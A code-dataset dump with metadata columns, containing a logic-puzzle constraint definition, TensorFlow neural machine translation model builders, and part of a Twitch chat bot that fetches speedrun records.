hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e89220dd48bc543e64841c042d1dbdefd57a80f1
| 7,940
|
py
|
Python
|
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | 2
|
2020-08-18T18:43:09.000Z
|
2020-08-18T20:05:59.000Z
|
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | null | null | null |
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | null | null | null |
from puzzle.puzzlepedia import puzzle
def get():
return puzzle.Puzzle('Pride Parade', SOURCE)
SOURCE = """
position in range(1, 7 + 1)
color in {orange, blue, violet, green, pink, red, yellow}
name in {Phyllis, Patria, Harvey, Courtney, Kimball, Li, Christopher}
direction in {left, right}
def sees(dimension):
if dimension.left:
result = dimension.position - 1
else:
result = 7 - dimension.position
return result
def dist(a, b):
return abs(a.position - b.position) - 1
# The person in the orange float can see exactly x floats more than Phyllis can, where x is some number.
orange_sees = sees(orange)
phyllis_sees = sees(Phyllis)
orange_sees > phyllis_sees
# x == 2.
x = orange_sees - phyllis_sees
# If the blue and violet floats are facing the same direction, then Patria is in one of those floats; otherwise, Patria is in the green float.
if blue.left == violet.left:
Patria.blue or Patria.violet
else:
Patria.green
# The person in the blue float can see, directly in front of it, another float whose driver has x letters in his/her name.
# NOTE: Names are 2, 6, 7, 11 so x == 2 or x == 6. 6 is too big for z.
(x == 2)
# If x == 2: blue sees Li.
#if blue.left:
# blue[1] == False
# Li.position == blue.position - 1
#else:
# blue[7] == False
Li.position == blue.position + 1
blue.right == True
# There is an even number of floats between Harvey’s and the pink float (not including themselves).
float_distance = dist(Harvey, pink)
(float_distance == 2) or (float_distance == 4)
# The red float is the farthest west.
red.position[1] == True
# If Courtney’s float is blue, orange, violet, or green, then at least one of Courtney’s neighbors has a name containing the letter Y.
c_is_bovg = (Courtney.blue or Courtney.orange or Courtney.violet or Courtney.green)
if c_is_bovg:
dist(Phyllis, Courtney) == 0 or dist(Harvey, Courtney) == 0
# Harvey can see Kimball’s float directly in front of him.
Kimball.position == Harvey.position + 1
Harvey.right == True
#(Harvey.left * (Kimball.position == Harvey.position - 1)) or (Harvey.right * (Kimball.position == Harvey.position + 1))
#if Harvey.left:
# Kimball.position == Harvey.position - 1
#else:
# Kimball.position == Harvey.position + 1
# The violet float is next to the yellow float if and only if Li’s float is pink.
(Li == pink) == (abs(violet.position - yellow.position) == 1)
# The people in the orange and pink floats can see the blue float somewhere ahead.
blue_left_of_orange = blue.position < orange.position
orange.left == blue_left_of_orange
blue_right_of_orange = blue.position > orange.position
orange.right == blue_right_of_orange
blue_left_of_pink = blue.position < pink.position
pink.left == blue_left_of_pink
blue_right_of_pink = blue.position > pink.position
pink.right == blue_right_of_pink
# If Li’s float is east of Harvey’s, then Li’s float is either orange or pink.
if Li.position > Harvey.position:
Li.orange or Li.pink
# If Harvey’s float is red or orange, then Kimball’s float is a primary color.
if Harvey.red or Harvey.orange:
Kimball.red or Kimball.blue
# If the red and yellow floats are next to each other, then the person in the red float can see fewer than y other floats, where y = x + 1.
red_yellow_neighbors = abs(red.position - yellow.position) == 1
red_sees = sees(red)
y = x + 1
if red_yellow_neighbors:
red_sees < y
# If Christopher’s float is a secondary color, then he can see more floats than Courtney can.
if Christopher.violet or Christopher.orange or Christopher.green:
sees(Christopher) > sees(Courtney)
# The person in the red float has a name that is z letters long, where z = x * y.
# x = 2 or 6
# y = 3 or 7
# z = 6, 14, 18, 42
# Only "6" works.
z = x * y
(red == Harvey) or (red == Patria)
# The pink, violet, and green floats are facing the same direction.
pink.left == violet.left == violet.left == green.left
"""
SOURCE = """
position in range(1, 7 + 1)
color in {orange, blue, violet, green, pink, red, yellow}
name in {Phyllis, Patria, Harvey, Courtney, Kimball, Li, Christopher}
direction in {left, right}
def sees(dimension):
if dimension.left:
result = dimension.position - 1
else:
result = 7 - dimension.position
return result
# The person in the orange float can see exactly x floats more than Phyllis can, where x is some number.
orange_sees = sees(orange)
phyllis_sees = sees(Phyllis)
orange_sees > phyllis_sees
x = orange_sees - phyllis_sees
# If the blue and violet floats are facing the same direction, then Patria is in one of those floats; otherwise, Patria is in the green float.
if blue.left == violet.left:
Patria.blue or Patria.violet
else:
Patria.green
# The person in the blue float can see, directly in front of it, another float whose driver has x letters in his/her name.
# NOTE: Names are 2, 6, 7, 11 so x == 2 or x == 6. 6 is too big for z.
(x == 2)
# If x == 2: blue sees Li.
if blue.left:
blue[1] == False
all(Li[i - 1] == blue[i] for i in range(2, 8))
else:
blue[7] == False
all(Li[i + 1] == blue[i] for i in range(1, 7))
float_distance = abs(Harvey.position - pink.position) - 1
(float_distance == 2) ^ (float_distance == 4)
# The red float is the farthest west.
red.position[1] == True
# If Courtney’s float is blue, orange, violet, or green, then at least one of Courtney’s neighbors has a name containing the letter Y.
c_is_bovg = (Courtney.blue or Courtney.orange or Courtney.violet or Courtney.green)
c_left_neighbor_has_y = all(Phyllis[i - 1] or Harvey[i - 1] for i in range(2, 8) if Courtney[i])
c_right_neighbor_has_y = all(Phyllis[i + 1] or Harvey[i + 1] for i in range(1, 7) if Courtney[i])
if c_is_bovg:
c_left_neighbor_has_y or c_right_neighbor_has_y
# Harvey can see Kimball’s float directly in front of him.
if Harvey.left:
Harvey[1] == False
all(Kimball[i - 1] for i in range(2, 8) if Harvey[i])
else:
Harvey[7] == False
all(Kimball[i + 1] for i in range(1, 7) if Harvey[i])
# The violet float is next to the yellow float if and only if Li’s float is pink.
(Li == pink) == (abs(violet.position - yellow.position) == 1)
# The people in the orange and pink floats can see the blue float somewhere ahead.
blue_left_of_orange = blue.position < orange.position
orange.left == blue_left_of_orange
blue_right_of_orange = blue.position > orange.position
orange.right == blue_right_of_orange
blue_left_of_pink = blue.position < pink.position
pink.left == blue_left_of_pink
blue_right_of_pink = blue.position > pink.position
pink.right == blue_right_of_pink
# If Li’s float is east of Harvey’s, then Li’s float is either orange or pink.
if Li.position > Harvey.position:
Li.orange or Li.pink
# If Harvey’s float is red or orange, then Kimball’s float is a primary color.
if Harvey.red or Harvey.orange:
Kimball.red or Kimball.blue
# If the red and yellow floats are next to each other, then the person in the red float can see fewer than y other floats, where y = x + 1.
red_yellow_neighbors = abs(red.position - yellow.position) == 1
red_sees = sees(red)
y = x + 1
if red_yellow_neighbors:
red_sees < y
# If Christopher’s float is a secondary color, then he can see more floats than Courtney can.
if Christopher.violet or Christopher.orange or Christopher.green:
sees(Christopher) > sees(Courtney)
# The person in the red float has a name that is z letters long, where z = x * y.
# x = 2 or 6
# y = 3 or 7
# z = 6, 14, 18, 42
# Only "6" works.
z = x * y
(red == Harvey) or (red == Patria)
# The pink, violet, and green floats are facing the same direction.
pink.left == violet.left == violet.left == green.left
"""
SOLUTION = """
position | color | name | direction
1 | red | Harvey | right
2 | blue | Kimball | right
3 | orange | Li | left
4 | pink | Courtney | left
5 | violet | Christopher | left
6 | green | Patria | left
7 | yellow | Phyllis | right
"""
| 35.605381
| 142
| 0.704282
| 1,362
| 7,940
| 4.030837
| 0.101322
| 0.022951
| 0.020401
| 0.020401
| 0.885064
| 0.860291
| 0.850273
| 0.835701
| 0.835701
| 0.822587
| 0
| 0.017681
| 0.195088
| 7,940
| 222
| 143
| 35.765766
| 0.841339
| 0
| 0
| 0.751351
| 0
| 0.162162
| 0.982242
| 0.016121
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005405
| false
| 0
| 0.005405
| 0.005405
| 0.032432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a6b76784f0a0ff78794f2b94770bc0bdb982ea
| 7,635
|
py
|
Python
|
tsf_nmt/build_ops.py
|
giancds/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 71
|
2016-01-26T03:14:55.000Z
|
2022-02-27T20:27:00.000Z
|
tsf_nmt/build_ops.py
|
afcarl/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 2
|
2016-05-16T06:54:06.000Z
|
2017-01-01T12:59:01.000Z
|
tsf_nmt/build_ops.py
|
afcarl/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 19
|
2016-05-11T09:48:12.000Z
|
2018-08-05T16:50:15.000Z
|
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.python.platform import gfile
import attention
import content_functions
import decoders
import nmt_models
def create_seq2seq_model(session, forward_only, model_path=None, use_best=False, FLAGS=None, buckets=None, translate=False):
"""Create translation model and initialize or load parameters in session."""
assert FLAGS is not None
assert buckets is not None
decode_input = FLAGS.decode_input
decode_file = FLAGS.decode_file
assert (decode_input is True and decode_file is False) \
or (decode_input is False and decode_file is True) \
or (decode_input is False and decode_file is False), \
'Cannot decode from input AND from file. Please choose just one option.'
# we should set batch to 1 when decoding
if decode_input or decode_file:
batch = 1
else:
batch = FLAGS.batch_size
dropout_rate = FLAGS.dropout
if translate:
dropout_rate = 0.0
if FLAGS.output_attention == "None":
if FLAGS.informed_decoder:
decoder = decoders.attention_decoder_informed
else:
decoder = decoders.attention_decoder
else:
if FLAGS.informed_decoder:
decoder = decoders.attention_decoder_output_informed
else:
decoder = decoders.attention_decoder_output
attention_f = attention.get_attention_f(FLAGS.attention_type)
content_function = content_functions.get_content_f(FLAGS.content_function)
decoder_attention_f = content_functions.get_decoder_content_f(FLAGS.output_attention)
model = nmt_models.Seq2SeqModel(source_vocab_size=FLAGS.src_vocab_size,
target_vocab_size=FLAGS.tgt_vocab_size,
buckets=buckets,
source_proj_size=FLAGS.proj_size,
target_proj_size=FLAGS.proj_size,
encoder_size=FLAGS.hidden_size,
decoder_size=FLAGS.hidden_size,
num_layers_encoder=FLAGS.num_layers,
num_layers_decoder=FLAGS.num_layers,
max_gradient_norm=FLAGS.max_gradient_norm,
batch_size=batch,
learning_rate=FLAGS.learning_rate,
learning_rate_decay_factor=FLAGS.learning_rate_decay_factor,
decoder=decoder,
optimizer=FLAGS.optimizer,
use_lstm=FLAGS.use_lstm,
input_feeding=FLAGS.input_feeding,
dropout=dropout_rate,
attention_f=attention_f,
window_size=FLAGS.window_size,
content_function=content_function,
decoder_attention_f=decoder_attention_f,
num_samples=FLAGS.num_samples_loss,
forward_only=forward_only,
max_len=FLAGS.max_len,
cpu_only=FLAGS.cpu_only,
early_stop_patience=FLAGS.early_stop_patience,
save_best_model=FLAGS.save_best_model,
log_tensorboard=FLAGS.log_tensorboard)
if model_path is None:
if use_best:
ckpt = tf.train.get_checkpoint_state(FLAGS.best_models_dir)
else:
ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
if ckpt and gfile.Exists(ckpt.model_checkpoint_path):
print('Reading model parameters from %s' % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
else:
print('Created model with fresh parameters.')
session.run(tf.initialize_all_variables())
else:
print('Reading model parameters from %s' % model_path)
model.saver.restore(session, model_path)
return model
def create_nmt_model(session, forward_only, model_path=None, use_best=False, FLAGS=None, buckets=None, translate=False):
"""Create translation model and initialize or load parameters in session."""
assert FLAGS is not None
assert buckets is not None
decode_input = FLAGS.decode_input
decode_file = FLAGS.decode_file
assert (decode_input is True and decode_file is False) \
or (decode_input is False and decode_file is True) \
or (decode_input is False and decode_file is False), \
'Cannot decode from input AND from file. Please choose just one option.'
# we should set batch to 1 when decoding
if decode_input or decode_file:
batch = 1
else:
batch = FLAGS.batch_size
dropout_rate = FLAGS.dropout
if translate:
dropout_rate = 0.0
attention_f = attention.get_attention_f(FLAGS.attention_type)
content_function = content_functions.get_content_f(FLAGS.content_function)
decoder_attention_f = content_functions.get_decoder_content_f(FLAGS.output_attention)
model = nmt_models.NMTModel(source_vocab_size=FLAGS.src_vocab_size,
target_vocab_size=FLAGS.tgt_vocab_size,
buckets=buckets,
source_proj_size=FLAGS.proj_size,
target_proj_size=FLAGS.proj_size,
encoder_size=FLAGS.hidden_size,
decoder_size=FLAGS.hidden_size,
max_gradient_norm=FLAGS.max_gradient_norm,
batch_size=batch,
learning_rate=FLAGS.learning_rate,
learning_rate_decay_factor=FLAGS.learning_rate_decay_factor,
optimizer=FLAGS.optimizer,
input_feeding=FLAGS.input_feeding,
dropout=dropout_rate,
attention_f=attention_f,
window_size=FLAGS.window_size,
content_function=content_function,
decoder_attention_f=decoder_attention_f,
num_samples=FLAGS.num_samples_loss,
forward_only=forward_only,
max_len=FLAGS.max_len,
cpu_only=FLAGS.cpu_only,
early_stop_patience=FLAGS.early_stop_patience,
save_best_model=FLAGS.save_best_model)
if model_path is None:
if use_best:
ckpt = tf.train.get_checkpoint_state(FLAGS.best_models_dir)
else:
ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
if ckpt and gfile.Exists(ckpt.model_checkpoint_path):
print('Reading model parameters from %s' % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
else:
print('Created model with fresh parameters.')
session.run(tf.initialize_all_variables())
else:
print('Reading model parameters from %s' % model_path)
model.saver.restore(session, model_path)
return model
| 43.135593
| 124
| 0.581532
| 819
| 7,635
| 5.107448
| 0.150183
| 0.033469
| 0.018647
| 0.021516
| 0.907961
| 0.905092
| 0.884533
| 0.884533
| 0.859192
| 0.859192
| 0
| 0.002261
| 0.362672
| 7,635
| 176
| 125
| 43.380682
| 0.857378
| 0.031696
| 0
| 0.839416
| 0
| 0
| 0.046612
| 0
| 0
| 0
| 0
| 0
| 0.043796
| 1
| 0.014599
| false
| 0
| 0.043796
| 0
| 0.072993
| 0.043796
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8cc6a9faccd293e09c3f6891d4bcacfd13fbd19
| 48,471
|
py
|
Python
|
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
import string
import re
import time
import math
import urllib.request
from urllib.request import urlopen
from json import loads
from Socket import openSocket, sendMessage
from Initialize import joinRoom
from Read import getUser, getMessage, getChannel
from Settings import COOLDOWN, IDENT, ADMIN, CLIENT_ID
from Games import GAMES, CATEGORIES, PLATFORMS
def getUserID(username):
try:
url = "https://api.twitch.tv/kraken/users?login={}".format(username)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
USER_ID = lst['users'][0]['_id']
return USER_ID
def getStreamTitle(USER_ID):
try:
url = "https://api.twitch.tv/kraken/channels/{}".format(USER_ID)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
title = lst['status'].lower()
return title
def getGame(USER_ID):
try:
url = "https://api.twitch.tv/kraken/channels/{}".format(USER_ID)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
current_game = lst['game']
if isinstance(current_game, str) == True:
pass
else:
return None, None, None
for i in range(len(GAMES)):
if GAMES[i][0].lower() == current_game.lower():
game = GAMES[i][1]
platform = GAMES[i][3]
platform_title = GAMES[i][2]
return game, platform, platform_title
return None, None, None
def isEmulator(title):
if 'emulator' in title:
return True
else:
return False
def joinChannel(input):
if input == message.lower().strip() and CHANNEL == ADMIN:
global channel_list
is_joined = False
for chan in channel_list:
chan = chan.split(':')[0]
if chan == user:
is_joined = True
break
if is_joined == False:
with open('channels.txt', 'a') as f:
f.write(user + ":" + user + "\n")
channel_list.append(user + ":" + user)
s.send(("JOIN #" + user + "\r\n").encode())
sendMessage(s, user, "/me has joined.")
sendMessage(s, CHANNEL, "@" + user.title() + " speedrunb0t has successfully joined your channel.")
cooldown()
else:
sendMessage(s, CHANNEL, "@" + user.title() + " speedrunb0t is already in your channel.")
cooldown()
def addChannel(input):
if input == message.lower().split()[0] and user == ADMIN:
try:
newChannel = message.lower().split()[1]
except IndexError as err:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !addchannel command. Correct syntax is !addchannel <channel>")
return
try:
message.split()[2]
except IndexError as err:
pass
else:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !addchannel command. Correct syntax is !addchannel <channel>")
return
global channel_list
is_joined = False
for chan in channel_list:
chan = chan.split(':')[0]
if chan == newChannel:
is_joined = True
break
if is_joined == False:
with open('channels.txt', 'a') as f:
f.write(newChannel + ":" + newChannel + "\n")
channel_list.append(newChannel + ":" + newChannel)
s.send(("JOIN #" + newChannel + "\r\n").encode())
sendMessage(s, newChannel, "/me has joined.")
sendMessage(s, CHANNEL, "speedrunb0t has successfully joined " + newChannel.title() + "'s channel.")
cooldown()
return
else:
sendMessage(s, CHANNEL, "speedrunb0t is already in " + newChannel.title() + "'s channel.")
cooldown()
return
elif input == message.lower().split()[0] and user != ADMIN:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the Bot Administrator may use the !addchannel command.")
cooldown()
return
def channels(input):
if input == message.lower().strip() and user == ADMIN:
global channel_list
channels = []
for chan in channel_list:
chan = chan.split(':')[0]
channels.append(chan)
channels_message = "speedrunb0t is currently being used in the following " + str(len(channels)) + " channels: " + str(channels)
if len(channels_message) < 500:
sendMessage(s, CHANNEL, channels_message)
elif len(channels_message) < 1000:
sendMessage(s, CHANNEL, channels_message[0:500])
sendMessage(s, CHANNEL, channels_message[500:])
else:
sendMessage(s, CHANNEL, "The list of channels is too long.")
elif input == message.lower().strip() and user != ADMIN:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the Bot Administrator may use the !channels command.")
cooldown()
return
def setSRCName(input):
if input == message.lower().split()[0]:
if user == CHANNEL:
global channel_list
try:
new_srcname = message.lower().split(' ', 1)[1].strip()
except IndexError as err:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !setsrcname command. Correct syntax is !setsrcname <src_username>")
cooldown()
return
if ' ' in new_srcname:
sendMessage(s, CHANNEL, "Error: New Speedrun.com username must not contain whitespace")
cooldown()
return
new_line = user.lower() + ":" + new_srcname.lower()
with open("channels.txt", "r+") as f:
for chan in channel_list:
if chan.split(':')[0] == user:
channel_list.remove(chan)
channel_list.append(new_line)
f.truncate(0)
f.writelines(channel_list)
break
sendMessage(s, CHANNEL, "The Speedrun.com username associated with this channel has been set to \'" + new_srcname + "\'.")
cooldown()
elif user != CHANNEL:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the channel owner may use this command.")
cooldown()
#Returns the world record for the category that's written in the stream title
def worldRecord(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=1&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][0]['names']['international']
time_in_sec = int(lst['data']['runs'][0]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
wr = ''
if hours[0] > 0:
wr = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
wr = str(minutes[0]) + "m " + str(seconds) + "s "
else:
wr = str(seconds) + "s "
sendMessage(s, CHANNEL, "The " + category_title + " world record is " + wr + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def second(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=2&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][1]['names']['international']
time_in_sec = int(lst['data']['runs'][1]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
place2nd = ''
if hours[0] > 0:
place2nd = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
place2nd = str(minutes[0]) + "m " + str(seconds) + "s "
else:
place2nd = str(seconds) + "s "
sendMessage(s, CHANNEL, "The 2nd place time for " + category_title + " is " + place2nd + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def third(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
